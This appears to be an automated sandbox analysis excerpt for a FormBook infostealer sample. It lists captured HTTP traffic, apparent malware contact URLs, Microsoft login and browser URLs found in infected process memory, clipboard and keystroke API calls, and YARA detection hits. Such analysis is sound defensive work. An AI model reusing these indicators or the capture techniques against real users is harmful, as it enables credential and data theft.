20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:32 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 07:25:34 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 07:26:08 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 07:26:10 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 07:26:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 07:26:15 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 07:26:15 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 07:26:15 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.000000000495C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.nobartv6.website/pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIu
            Source: DJonRIGNYjBRZ.exe, 00000007.00000002.4154876608.0000000005794000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sailnway.net
            Source: DJonRIGNYjBRZ.exe, 00000007.00000002.4154876608.0000000005794000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sailnway.net/lrst/
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000316E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000316E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000316E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000316E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000316E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000316E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000006.00000003.2281331663.0000000007CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000006.00000002.4153839675.0000000004920000.00000004.10000000.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.0000000003FF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000006.00000002.4153839675.00000000042D8000.00000004.10000000.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.00000000039A8000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2397067589.000000000CC28000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.elsupertodo.net/2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle
            Source: netbtugc.exe, 00000006.00000002.4155375798.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153839675.0000000004920000.00000004.10000000.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.0000000003FF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2670000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
